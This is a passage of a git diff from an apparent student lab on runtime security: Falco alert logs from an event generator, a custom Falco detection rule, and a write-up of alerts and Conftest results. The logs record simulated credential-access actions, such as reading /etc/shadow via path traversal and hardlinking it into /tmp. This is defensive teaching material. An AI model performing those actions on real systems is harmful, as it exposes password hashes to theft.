Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2025-10-26T16:18:39.327861706Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.594301373+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=runc ggparent=init gggparent=init evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495519594301373,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"runc","proc.aname[3]":"init","proc.aname[4]":"init","proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:39.594301373Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.702257748+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link evt_type=linkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1761495519702257748,"evt.type":"linkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:39.702257748Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.906506165+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=runc ggparent=init gggparent=init evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495519906506165,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"runc","proc.aname[3]":"init","proc.aname[4]":"init","proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:39.906506165Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:40.009214457+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id c57ba3de74625fffd40163becc1cd70f645feeb05b76ec3b915e0771b1b077c6 -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495520009214457,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id c57ba3de74625fffd40163becc1cd70f645feeb05b76ec3b915e0771b1b077c6 -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-10-26T16:18:40.009214457Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:40.111334332+0000: Informational System user ran an interactive command | evt_type=execve user=bin user_uid=2 user_loginuid=-1 process=login proc_exepath=/bin/busybox parent=event-generator command=login terminal=0 exe_flags=EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_LOWER_LAYER","evt.time.iso8601":1761495520111334332,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"login","proc.exepath":"/bin/busybox","proc.name":"login","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"bin","user.uid":2},"priority":"Informational","rule":"System user interactive","source":"syscall","tags":["NIST_800-53_AC-2","T1059","container","host","maturity_stable","mitre_execution","users"],"time":"2025-10-26T16:18:40.111334332Z"} diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml new file mode 100644 index 00000000..03a44460 --- /dev/null +++ b/labs/lab9/falco/rules/custom-rules.yaml @@ -0,0 +1,11 @@ +# Detect new writable file under /usr/local/bin inside any container +- rule: Write Binary Under UsrLocalBin + desc: Detects writes under /usr/local/bin inside any container + condition: evt.type in (open, openat, openat2, creat) and + evt.is_open_write=true and + fd.name startswith /usr/local/bin/ and + container.id != host + output: > + Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags) + priority: WARNING + tags: [container, compliance, drift] \ No newline at end of file diff --git a/labs/lab9/submission9.md b/labs/lab9/submission9.md new file mode 100644 index 00000000..5fa7c7f3 --- /dev/null +++ b/labs/lab9/submission9.md @@ -0,0 +1,101 @@ +# Task 1 — Runtime Security Detection with Falco + +## Baseline alerts observed from **falco.log** + +Baseline alerts: +- **Critical** - 3 occasions: + 1. **Detect release_agent File Container Escapes** - an attempt to exploit the escape vulnerability of the container + 2. **Fileless execution via memfd_create** - file-free execution via memfd + 3. **Drop and execute new binary in container** - executing a new binary file in a container + +- **Warning**: 15 occasions + 1. **Write Binary Under UsrLocalBin** - writing a file to /usr/local/bin + 2. **Create Symlink Over Sensitive Files** - creating symlinks to sensitive files + 3. **Find AWS Credentials** - AWS credentials search + 4. **Remove Bulk Data from Disk** - deleting data from a disk + 5. **Search Private Keys or Passwords** - search for private keys + 6. **Clear Log Activities** - clearing logs + 7. **Read sensitive file trusted after startup** - reading sensitive files + 8. **Netcat Remote Code Execution in Container** - running netcat with RCE + 9. **Execution from /dev/shm** - execution from /dev/shm + 10. **Debugfs Launched in Privileged Container** - running debugfs + 11. **Directory traversal monitored file read** - reading files through directory traversal + 12. **Create Hardlink Over Sensitive Files** - creating hardlinks + 13. **PTRACE attached to process** - attaching ptrace to a process + +- **Notice** - 4 occasions: + 1. **Terminal shell in container** - launching a shell in a container + 2. **Run shell untrusted** - running shell with an unreliable binary + 3. **Packet socket created in container** - creating a packet socket + 4. **Disallowed SSH Connection Non Standard Port** - SSH connection to a non-standard port + +- **Informational** - 1 occasion: + 1. **System user interactive** - the system user has run an interactive command + +## Custom rule’s purpose and when it should/shouldn’t fire + +**Rule:** "Write Binary Under UsrLocalBin" + +**Purpose:** Detecting file entries in the /usr/local/bin directory, which may indicate: + +- Installing unauthorized software +- An attempt at persistence in the system +- Downloading malicious binary files + +**When should it work:** + +- When writing any files to /usr/local/bin +- In containers and on hosts +- For all users, including root + +**When it shouldn't work:** + +- During legitimate software installation operations +- When using trusted system package managers +- In CI/CD pipelines with authorized dependency installation + +--- + +# Task 2 — Policy-as-Code with Conftest (Rego) + +## The policy violations from the unhardened manifest and why each matters for security + +- Latest Tag Usage +- Missing SecurityContext +- No Resource Limits +- Missing Liveness/Readiness Probes +- No Non-Root Execution +- Writable Root Filesystem +- Excessive Capabilities + +## The specific hardening changes in the hardened manifest that satisfy policies + +- Image Security Hardening +- Privilege Reduction +- Privilege Escalation Prevention +- Filesystem Hardening +- Linux Capabilities Dropping +- Resource Management +- Application Health Monitoring + +## Analysis of the Docker Compose manifest results + +**Unhardened manifest**: + +- **FAIL** - 8 occasions: + 1. **Missing CPU limits** - Risk of resource exhaustion attacks + 2. **Missing memory limits** - Potential for memory-based DoS + 3. **Missing CPU requests** - Poor cluster scheduling + 4. **Missing memory requests** - Unpredictable resource allocation + 5. **Privilege escalation allowed** - Container escape vulnerability + 6. **Writable root filesystem** - Malware persistence risk + 7. **Running as root** - Privilege escalation to host + 8. **Latest tag usage** - Supply chain unpredictability + +- **WARN** - 2 occasions: + 1. **Missing livenessProbe** - No automatic recovery from failures + 2. **Missing readinessProbe** - Potential service degradation + +**Hardened manifest**: + +All Security Controls Implemented \ No newline at end of file